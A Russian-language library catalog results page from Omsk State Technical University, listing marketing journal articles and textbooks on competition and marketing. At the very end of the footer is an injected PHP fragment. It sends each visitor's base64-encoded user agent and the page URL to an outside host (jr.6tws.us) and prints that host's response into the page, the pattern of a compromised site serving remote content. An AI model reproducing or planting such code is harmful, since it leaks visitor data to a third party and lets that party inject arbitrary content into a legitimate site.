Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

137 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=КОНКУРЕНЦИЯ - МАРКЕТИНГ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 4
1. 
Маркетинг и маркетинговые исследования. - Журнал, 2008г. № 4
Оглавление 
  • Ойнер, О. К. Эффективный инструментарий стимулирования сотрудников маркетинговых подразделений компании / О. К. Ойнер. - с.270-279
    Кл. слова: ЭФФЕКТИВНОСТЬ МАРКЕТИНГА, СТИМУЛИРОВАНИЕ ПЕРСОНАЛА, СИСТЕМА СТИМУЛИРОВАНИЯ
  • Сурков, С. Г. Социально-психологический подход в маркетинге: уравнения психодинамики / С. Г. Сурков. - с.280-291
    Кл. слова: АКТИВНОСТЬ ПОКУПАТЕЛЬСКАЯ, УРАВНЕНИЕ ПСИХОДИНАМИКИ
  • Смирнов, И. Н. Маркетинг "от Казановы": брендинг, психология масс и соблазнение / И. Н. Смирнов, Л. А. Кукушкина. - с.292-298
  • Короткевич, А. В. Корпоративная культура как основа репутационного капитала: методология построения, новые методы и формы воздействия / А. В. Короткевич. - с.300-311
    Кл. слова: КАПИТАЛ РЕПУТАЦИОННЫЙ, КУЛЬТУРА КОРПОРАТИВНАЯ
  • Шкардун, В. Д. Роль аналитической функции маркетинга в процессе стратегического планирования на предприятии / В. Д. Шкардун. - с.312-324
    Кл. слова: МАРКЕТИНГ - ПЛАНИРОВАНИЕ, КОНКУРЕНЦИЯ - МАРКЕТИНГ, АНАЛИЗ СТРАТЕГИЧЕСКИЙ
  • Письменская, Е. Б. Разработка системы планирования предприятия на примере производственной компании "Диваж - столица" / Е. Б. Письменская. - с.326-336
    Кл. слова: ПЛАНИРОВАНИЕ СТРАТЕГИЧЕСКОЕ
  • Кетова, Н. П. Маркетинговые стратегии и технологии деятельности венчурных фирм, работающих на рынке инновационных продуктов и услуг / Н. П. Кетова. - с.338-343
    Кл. слова: КОМПАНИЯ ВЕНЧУРНАЯ, СТРАТЕГИЯ МАРКЕТИНГОВАЯ, ХАЙ ТЕК, МАРКЕТИНГ ЛАТЕРАЛЬНЫЙ
  • Симонов, К. В. Ценообразование на экспоуслуги с учетом конкурентной среды выставочного бизнеса / К. В. Симонов. - с.344-359
    Кл. слова: ВЫСТАВКА - МАРКЕТИНГ, СРЕДА КОНКУРЕНТНАЯ, ЦЕНООБРАЗОВАНИЕ - МАРКЕТИНГ, ЭКСПОУСЛУГИ
2. 
Романенко С. Н. Маркетинг [Текст] : учеб. пособие для студентов учреждений сред. проф. образования / С. Н. Романенко, 2008. - 271 с.
Держатели документа (Информация об экземплярах) 
3. 
Кузьмина Е. Е. Теория и практика маркетинга [Текст] : учеб. для студ. высш. учеб. заведений / Е. Е. Кузьмина, Н. М. Шаляпина, 2005. - 213 с.
Ключевые слова 
МАРКЕТИНГ - теория -- СРЕДА МАРКЕТИНГОВАЯ -- ЭТИКА МАРКЕТИНГА -- МАРКЕТИНГ - практикум -- РЫНОК - МАРКЕТИНГ -- АНАЛИЗ РЫНКА -- СЕГМЕНТИРОВАНИЕ РЫНКА -- ПОЗИЦИОНИРОВАНИЕ РЫНКА -- АНАЛИЗ потребителей -- ПОВЕДЕНИЕ ПОКУПАТЕЛЯ -- ПОВЕДЕНИЕ ПОТРЕБИТЕЛЬСКОЕ -- ПРАВА потребителей -- ИССЛЕДОВАНИЕ МАРКЕТИНГОВОЕ -- КОНКУРЕНЦИЯ - МАРКЕТИНГ -- КОНКУРЕНТОСПОСОБНОСТЬ ПРЕДПР -- КОНКУРЕНТОСПОСОБНОСТЬ ТОВАРА -- ТОВАР - МАРКЕТИНГ -- ПОЛИТИКА ЦЕНОВАЯ - МАРКЕТИНГ -- ЦЕНА - МАРКЕТИНГ -- ТОВАРОДВИЖЕНИЕ -- ПОСРЕДНИК рыночный -- СБЫТ ТОВАРА -- ТОРГОВЛЯ ОПТОВАЯ - МАРКЕТИНГ -- ТОРГОВЛЯ РОЗНИЧНАЯ - МАРКЕТИ -- ПОЛИТИКА продвижения -- РЕКЛАМА - МАРКЕТИНГ -- СВЯЗЬ С ОБЩЕСТВЕННОСТЬЮ -- ПРОДАЖА ЛИЧНАЯ -- ПЛАНИРОВАНИЕ МАРКЕТИНГА
Держатели документа (Информация об экземплярах) 
4. 
Березин, Игорь Станиславович. Маркетинговый анализ [Текст] : производственно-практическое издание / И. Березин, 2004. - 352 с.
Ключевые слова 
Маркетинговые исследования -- ЦИКЛ ЖИЗНЕННЫЙ ТОВАРА -- МИССИЯ ОРГАНИЗАЦИИ -- СЕГМЕНТИРОВАНИЕ -- ПОЗИЦИОНИРОВАНИЕ ТОВАРА -- ЦЕНА - МАРКЕТИНГ -- Эластичность спроса по цене -- УПРАВЛЕНИЕ АССОРТИМЕНТОМ -- АНАЛИЗ ПОРТФЕЛЬНЫЙ -- бренд -- СТРУКТУРА ОРГАНИЗАЦИОННАЯ -- АУТСОРСИНГ -- СТИМУЛИРОВАНИЕ СБЫТА -- РЕКЛАМА - МАРКЕТИНГ -- СВЯЗЬ С ОБЩЕСТВЕННОСТЬЮ -- SWOT - АНАЛИЗ -- КОНКУРЕНЦИЯ - МАРКЕТИНГ -- РОССИЯ - ДЕМОГРАФИЯ -- ГЛОБАЛИЗАЦИЯ -- ДЕМОГРАФИЯ - РОССИЯ -- РОССИЯ - ЭКОНОМИКА -- СРЕДНИЙ КЛАСС - РОССИЯ -- РОССИЯ - КУЛЬТУРА -- Ценности - Россия -- ПЛАН МАРКЕТИНГА -- маркетинг - Обзор литературы
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3087 - 22.11.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.69 с.14 запросов, 0.52c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;